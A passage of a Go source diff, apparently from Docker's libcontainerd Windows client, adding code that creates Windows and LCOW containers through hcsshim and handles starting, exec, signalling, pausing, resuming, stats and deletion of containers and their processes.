+			return errors.New("OCI spec is invalid - Root.Path must be omitted for a Hyper-V container")
+		}
+	} else {
+		const volumeGUIDRegex = `^\\\\\?\\(Volume)\{{0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}\}\\$`
+		if _, err := regexp.MatchString(volumeGUIDRegex, spec.Root.Path); err != nil {
+			return fmt.Errorf(`OCI spec is invalid - Root.Path '%s' must be a volume GUID path in the format '\\?\Volume{GUID}\'`, spec.Root.Path)
+		}
+		// HCS API requires the trailing backslash to be removed
+		configuration.VolumePath = spec.Root.Path[:len(spec.Root.Path)-1]
+	}
+
+	if spec.Root.Readonly {
+		return errors.New(`OCI spec is invalid - Root.Readonly must not be set on Windows`)
+	}
+
+	for _, layerPath := range layerFolders {
+		_, filename := filepath.Split(layerPath)
+		g, err := hcsshim.NameToGuid(filename)
+		if err != nil {
+			return err
+		}
+		configuration.Layers = append(configuration.Layers, hcsshim.Layer{
+			ID:   g.ToString(),
+			Path: layerPath,
+		})
+	}
+
+	// Add the mounts (volumes, bind mounts etc) to the structure
+	var mds []hcsshim.MappedDir
+	var mps []hcsshim.MappedPipe
+	for _, mount := range spec.Mounts {
+		const pipePrefix = `\\.\pipe\`
+		if mount.Type != "" {
+			return fmt.Errorf("OCI spec is invalid - Mount.Type '%s' must not be set", mount.Type)
+		}
+		if strings.HasPrefix(mount.Destination, pipePrefix) {
+			mp := hcsshim.MappedPipe{
+				HostPath:          mount.Source,
+				ContainerPipeName: mount.Destination[len(pipePrefix):],
+			}
+			mps = append(mps, mp)
+		} else {
+			md := hcsshim.MappedDir{
+				HostPath:      mount.Source,
+				ContainerPath: mount.Destination,
+				ReadOnly:      false,
+			}
+			for _, o := range mount.Options {
+				if strings.ToLower(o) == "ro" {
+					md.ReadOnly = true
+				}
+			}
+			mds = append(mds, md)
+		}
+	}
+	configuration.MappedDirectories = mds
+	if len(mps) > 0 && system.GetOSVersion().Build < 16299 { // RS3
+		return errors.New("named pipe mounts are not supported on this version of Windows")
+	}
+	configuration.MappedPipes = mps
+
+	hcsContainer, err := hcsshim.CreateContainer(id, configuration)
+	if err != nil {
+		return err
+	}
+
+	// Construct a container object for calling start on it.
+	ctr := &container{
+		id:           id,
+		execs:        make(map[string]*process),
+		isWindows:    true,
+		ociSpec:      spec,
+		hcsContainer: hcsContainer,
+		status:       StatusCreated,
+		waitCh:       make(chan struct{}),
+	}
+
+	logger.Debug("starting container")
+	if err = hcsContainer.Start(); err != nil {
+		c.logger.WithError(err).Error("failed to start container")
+		ctr.debugGCS()
+		if err := c.terminateContainer(ctr); err != nil {
+			c.logger.WithError(err).Error("failed to cleanup after a failed Start")
+		} else {
+			c.logger.Debug("cleaned up after failed Start by calling Terminate")
+		}
+		return err
+	}
+	ctr.debugGCS()
+
+	c.Lock()
+	c.containers[id] = ctr
+	c.Unlock()
+
+	logger.Debug("createWindows() completed successfully")
+	return nil
+
+}
+
+func (c *client) createLinux(id string, spec *specs.Spec, runtimeOptions interface{}) error {
+	logrus.Debugf("libcontainerd: createLinux(): containerId %s ", id)
+	logger := c.logger.WithField("container", id)
+
+	if runtimeOptions == nil {
+		return fmt.Errorf("lcow option must be supplied to the runtime")
+	}
+	lcowConfig, ok := runtimeOptions.(*opengcs.Config)
+	if !ok {
+		return fmt.Errorf("lcow option must be supplied to the runtime")
+	}
+
+	configuration := &hcsshim.ContainerConfig{
+		HvPartition:   true,
+		Name:          id,
+		SystemType:    "container",
+		ContainerType: "linux",
+		Owner:         defaultOwner,
+		TerminateOnLastHandleClosed: true,
+	}
+
+	if lcowConfig.ActualMode == opengcs.ModeActualVhdx {
+		configuration.HvRuntime = &hcsshim.HvRuntime{
+			ImagePath:          lcowConfig.Vhdx,
+			BootSource:         "Vhd",
+			WritableBootSource: false,
+		}
+	} else {
+		configuration.HvRuntime = &hcsshim.HvRuntime{
+			ImagePath:           lcowConfig.KirdPath,
+			LinuxKernelFile:     lcowConfig.KernelFile,
+			LinuxInitrdFile:     lcowConfig.InitrdFile,
+			LinuxBootParameters: lcowConfig.BootParameters,
+		}
+	}
+
+	if spec.Windows == nil {
+		return fmt.Errorf("spec.Windows must not be nil for LCOW containers")
+	}
+
+	// We must have least one layer in the spec
+	if spec.Windows.LayerFolders == nil || len(spec.Windows.LayerFolders) == 0 {
+		return fmt.Errorf("OCI spec is invalid - at least one LayerFolders must be supplied to the runtime")
+	}
+
+	// Strip off the top-most layer as that's passed in separately to HCS
+	configuration.LayerFolderPath = spec.Windows.LayerFolders[len(spec.Windows.LayerFolders)-1]
+	layerFolders := spec.Windows.LayerFolders[:len(spec.Windows.LayerFolders)-1]
+
+	for _, layerPath := range layerFolders {
+		_, filename := filepath.Split(layerPath)
+		g, err := hcsshim.NameToGuid(filename)
+		if err != nil {
+			return err
+		}
+		configuration.Layers = append(configuration.Layers, hcsshim.Layer{
+			ID:   g.ToString(),
+			Path: filepath.Join(layerPath, "layer.vhd"),
+		})
+	}
+
+	if spec.Windows.Network != nil {
+		configuration.EndpointList = spec.Windows.Network.EndpointList
+		configuration.AllowUnqualifiedDNSQuery = spec.Windows.Network.AllowUnqualifiedDNSQuery
+		if spec.Windows.Network.DNSSearchList != nil {
+			configuration.DNSSearchList = strings.Join(spec.Windows.Network.DNSSearchList, ",")
+		}
+		configuration.NetworkSharedContainerName = spec.Windows.Network.NetworkSharedContainerName
+	}
+
+	// Add the mounts (volumes, bind mounts etc) to the structure. We have to do
+	// some translation for both the mapped directories passed into HCS and in
+	// the spec.
+	//
+	// For HCS, we only pass in the mounts from the spec which are type "bind".
+	// Further, the "ContainerPath" field (which is a little mis-leadingly
+	// named when it applies to the utility VM rather than the container in the
+	// utility VM) is moved to under /tmp/gcs/<ID>/binds, where this is passed
+	// by the caller through a 'uvmpath' option.
+	//
+	// We do similar translation for the mounts in the spec by stripping out
+	// the uvmpath option, and translating the Source path to the location in the
+	// utility VM calculated above.
+	//
+	// From inside the utility VM, you would see a 9p mount such as in the following
+	// where a host folder has been mapped to /target. The line with /tmp/gcs/<ID>/binds
+	// specifically:
+	//
+	//	/ # mount
+	//	rootfs on / type rootfs (rw,size=463736k,nr_inodes=115934)
+	//	proc on /proc type proc (rw,relatime)
+	//	sysfs on /sys type sysfs (rw,relatime)
+	//	udev on /dev type devtmpfs (rw,relatime,size=498100k,nr_inodes=124525,mode=755)
+	//	tmpfs on /run type tmpfs (rw,relatime)
+	//	cgroup on /sys/fs/cgroup type cgroup (rw,relatime,cpuset,cpu,cpuacct,blkio,memory,devices,freezer,net_cls,perf_event,net_prio,hugetlb,pids,rdma)
+	//	mqueue on /dev/mqueue type mqueue (rw,relatime)
+	//	devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
+	//	/binds/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/target on /binds/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/target type 9p (rw,sync,dirsync,relatime,trans=fd,rfdno=6,wfdno=6)
+	//	/dev/pmem0 on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/layer0 type ext4 (ro,relatime,block_validity,delalloc,norecovery,barrier,dax,user_xattr,acl)
+	//	/dev/sda on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch type ext4 (rw,relatime,block_validity,delalloc,barrier,user_xattr,acl)
+	//	overlay on /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/rootfs type overlay (rw,relatime,lowerdir=/tmp/base/:/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/layer0,upperdir=/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch/upper,workdir=/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc/scratch/work)
+	//
+	//  /tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc # ls -l
+	//	total 16
+	//	drwx------    3 0        0               60 Sep  7 18:54 binds
+	//	-rw-r--r--    1 0        0             3345 Sep  7 18:54 config.json
+	//	drwxr-xr-x   10 0        0             4096 Sep  6 17:26 layer0
+	//	drwxr-xr-x    1 0        0             4096 Sep  7 18:54 rootfs
+	//	drwxr-xr-x    5 0        0             4096 Sep  7 18:54 scratch
+	//
+	//	/tmp/gcs/b3ea9126d67702173647ece2744f7c11181c0150e9890fc9a431849838033edc # ls -l binds
+	//	total 0
+	//	drwxrwxrwt    2 0        0             4096 Sep  7 16:51 target
+
+	mds := []hcsshim.MappedDir{}
+	specMounts := []specs.Mount{}
+	for _, mount := range spec.Mounts {
+		specMount := mount
+		if mount.Type == "bind" {
+			// Strip out the uvmpath from the options
+			updatedOptions := []string{}
+			uvmPath := ""
+			readonly := false
+			for _, opt := range mount.Options {
+				dropOption := false
+				elements := strings.SplitN(opt, "=", 2)
+				switch elements[0] {
+				case "uvmpath":
+					uvmPath = elements[1]
+					dropOption = true
+				case "rw":
+				case "ro":
+					readonly = true
+				case "rbind":
+				default:
+					return fmt.Errorf("unsupported option %q", opt)
+				}
+				if !dropOption {
+					updatedOptions = append(updatedOptions, opt)
+				}
+			}
+			mount.Options = updatedOptions
+			if uvmPath == "" {
+				return fmt.Errorf("no uvmpath for bind mount %+v", mount)
+			}
+			md := hcsshim.MappedDir{
+				HostPath:          mount.Source,
+				ContainerPath:     path.Join(uvmPath, mount.Destination),
+				CreateInUtilityVM: true,
+				ReadOnly:          readonly,
+			}
+			mds = append(mds, md)
+			specMount.Source = path.Join(uvmPath, mount.Destination)
+		}
+		specMounts = append(specMounts, specMount)
+	}
+	configuration.MappedDirectories = mds
+
+	hcsContainer, err := hcsshim.CreateContainer(id, configuration)
+	if err != nil {
+		return err
+	}
+
+	spec.Mounts = specMounts
+
+	// Construct a container object for calling start on it.
+	ctr := &container{
+		id:           id,
+		execs:        make(map[string]*process),
+		isWindows:    false,
+		ociSpec:      spec,
+		hcsContainer: hcsContainer,
+		status:       StatusCreated,
+		waitCh:       make(chan struct{}),
+	}
+
+	// Start the container.
+	logger.Debug("starting container")
+	if err = hcsContainer.Start(); err != nil {
+		c.logger.WithError(err).Error("failed to start container")
+		ctr.debugGCS()
+		if err := c.terminateContainer(ctr); err != nil {
+			c.logger.WithError(err).Error("failed to cleanup after a failed Start")
+		} else {
+			c.logger.Debug("cleaned up after failed Start by calling Terminate")
+		}
+		return err
+	}
+	ctr.debugGCS()
+
+	c.Lock()
+	c.containers[id] = ctr
+	c.Unlock()
+
+	c.eventQ.append(id, func() {
+		ei := EventInfo{
+			ContainerID: id,
+		}
+		c.logger.WithFields(logrus.Fields{
+			"container": ctr.id,
+			"event":     EventCreate,
+		}).Info("sending event")
+		err := c.backend.ProcessEvent(id, EventCreate, ei)
+		if err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container": id,
+				"event":     EventCreate,
+			}).Error("failed to process event")
+		}
+	})
+
+	logger.Debug("createLinux() completed successfully")
+	return nil
+}
+
+func (c *client) Start(_ context.Context, id, _ string, withStdin bool, attachStdio StdioCallback) (int, error) {
+	ctr := c.getContainer(id)
+	switch {
+	case ctr == nil:
+		return -1, errors.WithStack(newNotFoundError("no such container"))
+	case ctr.init != nil:
+		return -1, errors.WithStack(newConflictError("container already started"))
+	}
+
+	logger := c.logger.WithField("container", id)
+
+	// Note we always tell HCS to create stdout as it's required
+	// regardless of '-i' or '-t' options, so that docker can always grab
+	// the output through logs. We also tell HCS to always create stdin,
+	// even if it's not used - it will be closed shortly. Stderr is only
+	// created if it we're not -t.
+	var (
+		emulateConsole   bool
+		createStdErrPipe bool
+	)
+	if ctr.ociSpec.Process != nil {
+		emulateConsole = ctr.ociSpec.Process.Terminal
+		createStdErrPipe = !ctr.ociSpec.Process.Terminal
+	}
+
+	createProcessParms := &hcsshim.ProcessConfig{
+		EmulateConsole:   emulateConsole,
+		WorkingDirectory: ctr.ociSpec.Process.Cwd,
+		CreateStdInPipe:  true,
+		CreateStdOutPipe: true,
+		CreateStdErrPipe: createStdErrPipe,
+	}
+
+	if ctr.ociSpec.Process != nil && ctr.ociSpec.Process.ConsoleSize != nil {
+		createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height)
+		createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width)
+	}
+
+	// Configure the environment for the process
+	createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env)
+	if ctr.isWindows {
+		createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ")
+	} else {
+		createProcessParms.CommandArgs = ctr.ociSpec.Process.Args
+	}
+	createProcessParms.User = ctr.ociSpec.Process.User.Username
+
+	// LCOW requires the raw OCI spec passed through HCS and onwards to
+	// GCS for the utility VM.
+	if !ctr.isWindows {
+		ociBuf, err := json.Marshal(ctr.ociSpec)
+		if err != nil {
+			return -1, err
+		}
+		ociRaw := json.RawMessage(ociBuf)
+		createProcessParms.OCISpecification = &ociRaw
+	}
+
+	ctr.Lock()
+	defer ctr.Unlock()
+
+	// Start the command running in the container.
+	newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms)
+	if err != nil {
+		logger.WithError(err).Error("CreateProcess() failed")
+		return -1, err
+	}
+	defer func() {
+		if err != nil {
+			if err := newProcess.Kill(); err != nil {
+				logger.WithError(err).Error("failed to kill process")
+			}
+			go func() {
+				if err := newProcess.Wait(); err != nil {
+					logger.WithError(err).Error("failed to wait for process")
+				}
+				if err := newProcess.Close(); err != nil {
+					logger.WithError(err).Error("failed to clean process resources")
+				}
+			}()
+		}
+	}()
+	p := &process{
+		hcsProcess: newProcess,
+		id:         InitProcessName,
+		pid:        newProcess.Pid(),
+	}
+	logger.WithField("pid", p.pid).Debug("init process started")
+
+	dio, err := newIOFromProcess(newProcess, ctr.ociSpec.Process.Terminal)
+	if err != nil {
+		logger.WithError(err).Error("failed to get stdio pipes")
+		return -1, err
+	}
+	_, err = attachStdio(dio)
+	if err != nil {
+		logger.WithError(err).Error("failed to attache stdio")
+		return -1, err
+	}
+	ctr.status = StatusRunning
+	ctr.init = p
+
+	// Spin up a go routine waiting for exit to handle cleanup
+	go c.reapProcess(ctr, p)
+
+	// Generate the associated event
+	c.eventQ.append(id, func() {
+		ei := EventInfo{
+			ContainerID: id,
+			ProcessID:   InitProcessName,
+			Pid:         uint32(p.pid),
+		}
+		c.logger.WithFields(logrus.Fields{
+			"container":  ctr.id,
+			"event":      EventStart,
+			"event-info": ei,
+		}).Info("sending event")
+		err := c.backend.ProcessEvent(ei.ContainerID, EventStart, ei)
+		if err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container":  id,
+				"event":      EventStart,
+				"event-info": ei,
+			}).Error("failed to process event")
+		}
+	})
+	logger.Debug("start() completed")
+	return p.pid, nil
+}
+
+func newIOFromProcess(newProcess hcsshim.Process, terminal bool) (*cio.DirectIO, error) {
+	stdin, stdout, stderr, err := newProcess.Stdio()
+	if err != nil {
+		return nil, err
+	}
+
+	dio := cio.NewDirectIO(createStdInCloser(stdin, newProcess), nil, nil, terminal)
+
+	// Convert io.ReadClosers to io.Readers
+	if stdout != nil {
+		dio.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout})
+	}
+	if stderr != nil {
+		dio.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr})
+	}
+	return dio, nil
+}
+
+// Exec adds a process in an running container
+func (c *client) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error) {
+	ctr := c.getContainer(containerID)
+	switch {
+	case ctr == nil:
+		return -1, errors.WithStack(newNotFoundError("no such container"))
+	case ctr.hcsContainer == nil:
+		return -1, errors.WithStack(newInvalidParameterError("container is not running"))
+	case ctr.execs != nil && ctr.execs[processID] != nil:
+		return -1, errors.WithStack(newConflictError("id already in use"))
+	}
+	logger := c.logger.WithFields(logrus.Fields{
+		"container": containerID,
+		"exec":      processID,
+	})
+
+	// Note we always tell HCS to
+	// create stdout as it's required regardless of '-i' or '-t' options, so that
+	// docker can always grab the output through logs. We also tell HCS to always
+	// create stdin, even if it's not used - it will be closed shortly. Stderr
+	// is only created if it we're not -t.
+	createProcessParms := hcsshim.ProcessConfig{
+		CreateStdInPipe:  true,
+		CreateStdOutPipe: true,
+		CreateStdErrPipe: !spec.Terminal,
+	}
+	if spec.Terminal {
+		createProcessParms.EmulateConsole = true
+		if spec.ConsoleSize != nil {
+			createProcessParms.ConsoleSize[0] = uint(spec.ConsoleSize.Height)
+			createProcessParms.ConsoleSize[1] = uint(spec.ConsoleSize.Width)
+		}
+	}
+
+	// Take working directory from the process to add if it is defined,
+	// otherwise take from the first process.
+	if spec.Cwd != "" {
+		createProcessParms.WorkingDirectory = spec.Cwd
+	} else {
+		createProcessParms.WorkingDirectory = ctr.ociSpec.Process.Cwd
+	}
+
+	// Configure the environment for the process
+	createProcessParms.Environment = setupEnvironmentVariables(spec.Env)
+	if ctr.isWindows {
+		createProcessParms.CommandLine = strings.Join(spec.Args, " ")
+	} else {
+		createProcessParms.CommandArgs = spec.Args
+	}
+	createProcessParms.User = spec.User.Username
+
+	logger.Debugf("exec commandLine: %s", createProcessParms.CommandLine)
+
+	// Start the command running in the container.
+	newProcess, err := ctr.hcsContainer.CreateProcess(&createProcessParms)
+	if err != nil {
+		logger.WithError(err).Errorf("exec's CreateProcess() failed")
+		return -1, err
+	}
+	pid := newProcess.Pid()
+	defer func() {
+		if err != nil {
+			if err := newProcess.Kill(); err != nil {
+				logger.WithError(err).Error("failed to kill process")
+			}
+			go func() {
+				if err := newProcess.Wait(); err != nil {
+					logger.WithError(err).Error("failed to wait for process")
+				}
+				if err := newProcess.Close(); err != nil {
+					logger.WithError(err).Error("failed to clean process resources")
+				}
+			}()
+		}
+	}()
+
+	dio, err := newIOFromProcess(newProcess, spec.Terminal)
+	if err != nil {
+		logger.WithError(err).Error("failed to get stdio pipes")
+		return -1, err
+	}
+	// Tell the engine to attach streams back to the client
+	_, err = attachStdio(dio)
+	if err != nil {
+		return -1, err
+	}
+
+	p := &process{
+		id:         processID,
+		pid:        pid,
+		hcsProcess: newProcess,
+	}
+
+	// Add the process to the container's list of processes
+	ctr.Lock()
+	ctr.execs[processID] = p
+	ctr.Unlock()
+
+	// Spin up a go routine waiting for exit to handle cleanup
+	go c.reapProcess(ctr, p)
+
+	c.eventQ.append(ctr.id, func() {
+		ei := EventInfo{
+			ContainerID: ctr.id,
+			ProcessID:   p.id,
+			Pid:         uint32(p.pid),
+		}
+		c.logger.WithFields(logrus.Fields{
+			"container":  ctr.id,
+			"event":      EventExecAdded,
+			"event-info": ei,
+		}).Info("sending event")
+		err := c.backend.ProcessEvent(ctr.id, EventExecAdded, ei)
+		if err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container":  ctr.id,
+				"event":      EventExecAdded,
+				"event-info": ei,
+			}).Error("failed to process event")
+		}
+		err = c.backend.ProcessEvent(ctr.id, EventExecStarted, ei)
+		if err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container":  ctr.id,
+				"event":      EventExecStarted,
+				"event-info": ei,
+			}).Error("failed to process event")
+		}
+	})
+
+	return pid, nil
+}
+
+// Signal handles `docker stop` on Windows. While Linux has support for
+// the full range of signals, signals aren't really implemented on Windows.
+// We fake supporting regular stop and -9 to force kill.
+func (c *client) SignalProcess(_ context.Context, containerID, processID string, signal int) error {
+	ctr, p, err := c.getProcess(containerID, processID)
+	if err != nil {
+		return err
+	}
+
+	ctr.manualStopRequested = true
+
+	logger := c.logger.WithFields(logrus.Fields{
+		"container": containerID,
+		"process":   processID,
+		"pid":       p.pid,
+		"signal":    signal,
+	})
+	logger.Debug("Signal()")
+
+	if processID == InitProcessName {
+		if syscall.Signal(signal) == syscall.SIGKILL {
+			// Terminate the compute system
+			if err := ctr.hcsContainer.Terminate(); err != nil {
+				if !hcsshim.IsPending(err) {
+					logger.WithError(err).Error("failed to terminate hccshim container")
+				}
+			}
+		} else {
+			// Shut down the container
+			if err := ctr.hcsContainer.Shutdown(); err != nil {
+				if !hcsshim.IsPending(err) && !hcsshim.IsAlreadyStopped(err) {
+					// ignore errors
+					logger.WithError(err).Error("failed to shutdown hccshim container")
+				}
+			}
+		}
+	} else {
+		return p.hcsProcess.Kill()
+	}
+
+	return nil
+}
+
+// Resize handles a CLI event to resize an interactive docker run or docker
+// exec window.
+func (c *client) ResizeTerminal(_ context.Context, containerID, processID string, width, height int) error {
+	_, p, err := c.getProcess(containerID, processID)
+	if err != nil {
+		return err
+	}
+
+	c.logger.WithFields(logrus.Fields{
+		"container": containerID,
+		"process":   processID,
+		"height":    height,
+		"width":     width,
+		"pid":       p.pid,
+	}).Debug("resizing")
+	return p.hcsProcess.ResizeConsole(uint16(width), uint16(height))
+}
+
+func (c *client) CloseStdin(_ context.Context, containerID, processID string) error {
+	_, p, err := c.getProcess(containerID, processID)
+	if err != nil {
+		return err
+	}
+
+	return p.hcsProcess.CloseStdin()
+}
+
+// Pause handles pause requests for containers
+func (c *client) Pause(_ context.Context, containerID string) error {
+	ctr, _, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return err
+	}
+
+	if ctr.ociSpec.Windows.HyperV == nil {
+		return errors.New("cannot pause Windows Server Containers")
+	}
+
+	ctr.Lock()
+	defer ctr.Unlock()
+
+	if err = ctr.hcsContainer.Pause(); err != nil {
+		return err
+	}
+
+	ctr.status = StatusPaused
+
+	c.eventQ.append(containerID, func() {
+		err := c.backend.ProcessEvent(containerID, EventPaused, EventInfo{
+			ContainerID: containerID,
+			ProcessID:   InitProcessName,
+		})
+		c.logger.WithFields(logrus.Fields{
+			"container": ctr.id,
+			"event":     EventPaused,
+		}).Info("sending event")
+		if err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container": containerID,
+				"event":     EventPaused,
+			}).Error("failed to process event")
+		}
+	})
+
+	return nil
+}
+
+// Resume handles resume requests for containers
+func (c *client) Resume(_ context.Context, containerID string) error {
+	ctr, _, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return err
+	}
+
+	if ctr.ociSpec.Windows.HyperV == nil {
+		return errors.New("cannot resume Windows Server Containers")
+	}
+
+	ctr.Lock()
+	defer ctr.Unlock()
+
+	if err = ctr.hcsContainer.Resume(); err != nil {
+		return err
+	}
+
+	ctr.status = StatusRunning
+
+	c.eventQ.append(containerID, func() {
+		err := c.backend.ProcessEvent(containerID, EventResumed, EventInfo{
+			ContainerID: containerID,
+			ProcessID:   InitProcessName,
+		})
+		c.logger.WithFields(logrus.Fields{
+			"container": ctr.id,
+			"event":     EventResumed,
+		}).Info("sending event")
+		if err != nil {
+			c.logger.WithError(err).WithFields(logrus.Fields{
+				"container": containerID,
+				"event":     EventResumed,
+			}).Error("failed to process event")
+		}
+	})
+
+	return nil
+}
+
+// Stats handles stats requests for containers
+func (c *client) Stats(_ context.Context, containerID string) (*Stats, error) {
+	ctr, _, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return nil, err
+	}
+
+	readAt := time.Now()
+	s, err := ctr.hcsContainer.Statistics()
+	if err != nil {
+		return nil, err
+	}
+	return &Stats{
+		Read:     readAt,
+		HCSStats: &s,
+	}, nil
+}
+
+// Restore is the handler for restoring a container
+func (c *client) Restore(ctx context.Context, id string, attachStdio StdioCallback) (bool, int, error) {
+	c.logger.WithField("container", id).Debug("restore()")
+
+	// TODO Windows: On RS1, a re-attach isn't possible.
+	// However, there is a scenario in which there is an issue.
+	// Consider a background container. The daemon dies unexpectedly.
+	// HCS will still have the compute service alive and running.
+	// For consistence, we call in to shoot it regardless if HCS knows about it
+	// We explicitly just log a warning if the terminate fails.
+	// Then we tell the backend the container exited.
+	if hc, err := hcsshim.OpenContainer(id); err == nil {
+		const terminateTimeout = time.Minute * 2
+		err := hc.Terminate()
+
+		if hcsshim.IsPending(err) {
+			err = hc.WaitTimeout(terminateTimeout)
+		} else if hcsshim.IsAlreadyStopped(err) {
+			err = nil
+		}
+
+		if err != nil {
+			c.logger.WithField("container", id).WithError(err).Debug("terminate failed on restore")
+			return false, -1, err
+		}
+	}
+	return false, -1, nil
+}
+
+// GetPidsForContainer returns a list of process IDs running in a container.
+// Not used on Windows.
+func (c *client) ListPids(_ context.Context, _ string) ([]uint32, error) {
+	return nil, errors.New("not implemented on Windows")
+}
+
+// Summary returns a summary of the processes running in a container.
+// This is present in Windows to support docker top. In linux, the
+// engine shells out to ps to get process information. On Windows, as
+// the containers could be Hyper-V containers, they would not be
+// visible on the container host. However, libcontainerd does have
+// that information.
+func (c *client) Summary(_ context.Context, containerID string) ([]Summary, error) {
+	ctr, _, err := c.getProcess(containerID, InitProcessName)
+	if err != nil {
+		return nil, err
+	}
+
+	p, err := ctr.hcsContainer.ProcessList()
+	if err != nil {
+		return nil, err
+	}
+
+	pl := make([]Summary, len(p))
+	for i := range p {
+		pl[i] = Summary(p[i])
+	}
+	return pl, nil
+}
+
+func (c *client) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) {
+	ec := -1
+	ctr := c.getContainer(containerID)
+	if ctr == nil {
+		return uint32(ec), time.Now(), errors.WithStack(newNotFoundError("no such container"))
+	}
+
+	select {
+	case <-ctx.Done():
+		return uint32(ec), time.Now(), errors.WithStack(ctx.Err())
+	case <-ctr.waitCh:
+	default:
+		return uint32(ec), time.Now(), errors.New("container is not stopped")
+	}
+
+	ctr.Lock()
+	defer ctr.Unlock()
+	return ctr.exitCode, ctr.exitedAt, nil
+}
+
+func (c *client) Delete(_ context.Context, containerID string) error {
+	c.Lock()
+	defer c.Unlock()
+	ctr := c.containers[containerID]
+	if ctr == nil {
+		return errors.WithStack(newNotFoundError("no such container"))
+	}
+
+	ctr.Lock()
+	defer ctr.Unlock()
+
+	switch ctr.status {
+	case StatusCreated:
+		if err := c.shutdownContainer(ctr); err != nil {
+			return err
+		}
+		fallthrough
+	case StatusStopped:
+		delete(c.containers, containerID)
+		return nil
+	}
+
+	return errors.WithStack(newInvalidParameterError("container is not stopped"))
+}
+
+func (c *client) Status(ctx context.Context, containerID string) (Status, error) {
+	c.Lock()
+	defer c.Unlock()
+	ctr := c.containers[containerID]
+	if ctr == nil {
+		return StatusUnknown, errors.WithStack(newNotFoundError("no such container"))
+	}
+
+	ctr.Lock()
+	defer ctr.Unlock()
+	return ctr.status, nil
+}
+
+func (c *client) UpdateResources(ctx context.Context, containerID string, resources *Resources) error {
+	// Updating resource isn't supported on Windows
+	// but we should return nil for enabling updating container
+	return nil
+}
+
+func (c *client) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error {
+	return errors.New("Windows: Containers do not support checkpoints")
+}
+
+func (c *client) getContainer(id string) *container {
+	c.Lock()
+	ctr := c.containers[id]
+	c.Unlock()
+
+	return ctr
+}
+
+func (c *client) getProcess(containerID, processID string) (*container, *process, error) {
+	ctr := c.getContainer(containerID)
+	switch {
+	case ctr == nil:
+		return nil, nil, errors.WithStack(newNotFoundError("no such container"))
+	case ctr.init == nil:
+		return nil, nil, errors.WithStack(newNotFoundError("container is not running"))
+	case processID == InitProcessName:
+		return ctr, ctr.init, nil
+	default:
+		ctr.Lock()
+		defer ctr.Unlock()
+		if ctr.execs == nil {
+			return nil, nil, errors.WithStack(newNotFoundError("no execs"))
+		}
+	}
+
+	p := ctr.execs[processID]
+	if p == nil {
+		return nil, nil, errors.WithStack(newNotFoundError("no such exec"))
+	}
+
+	return ctr, p, nil
+}
+
+func (c *client) shutdownContainer(ctr *container) error {
+	const shutdownTimeout = time.Minute * 5
+	err := ctr.hcsContainer.Shutdown()
+
+	if hcsshim.IsPending(err) {
+		err = ctr.hcsContainer.WaitTimeout(shutdownTimeout)
+	} else if hcsshim.IsAlreadyStopped(err) {
+		err = nil
+	}
+
+	if err != nil {
+		c.logger.WithError(err).WithField("container", ctr.id).
+			Debug("failed to shutdown container, terminating it")
+		terminateErr := c.terminateContainer(ctr)
+		if terminateErr != nil {
+			c.logger.WithError(terminateErr).WithField("container", ctr.id).
+				Error("failed to shutdown container, and subsequent terminate also failed")
+			return fmt.Errorf("%s: subsequent terminate failed %s", err, terminateErr)
+		}
+		return err
+	}
+
+	return nil
+}
+
+func (c *client) terminateContainer(ctr *container) error {
+	const terminateTimeout = time.Minute * 5
+	err := ctr.hcsContainer.Terminate()
+
+	if hcsshim.IsPending(err) {
+		err = ctr.hcsContainer.WaitTimeout(terminateTimeout)
+	} else if hcsshim.IsAlreadyStopped(err) {
+		err = nil
+	}
+
+	if err != nil {
+		c.logger.WithError(err).WithField("container", ctr.id).
+			Debug("failed to terminate container")
+		return err
+	}
+
+	return nil
+}
+
+func (c *client) reapProcess(ctr *container, p *process) int {
+	logger := c.logger.WithFields(logrus.Fields{
+		"container": ctr.id,
+		"process":   p.id,
+	})
+
+	var eventErr error
+
+	// Block indefinitely for the process to exit.
+	if err := p.hcsProcess.Wait(); err != nil {
+		if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != windows.ERROR_BROKEN_PIPE {
+			logger.WithError(err).Warnf("Wait() failed (container may have been killed)")
+		}
+		// Fall through here, do not return. This ensures we attempt to
+		// continue the shutdown in HCS and tell the docker engine that the
+		// process/container has exited to avoid a container being dropped on
+		// the floor.
+	}
+	exitedAt := time.Now()
+
+	exitCode, err := p.hcsProcess.ExitCode()
+	if err != nil {
+		if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != windows.ERROR_BROKEN_PIPE {
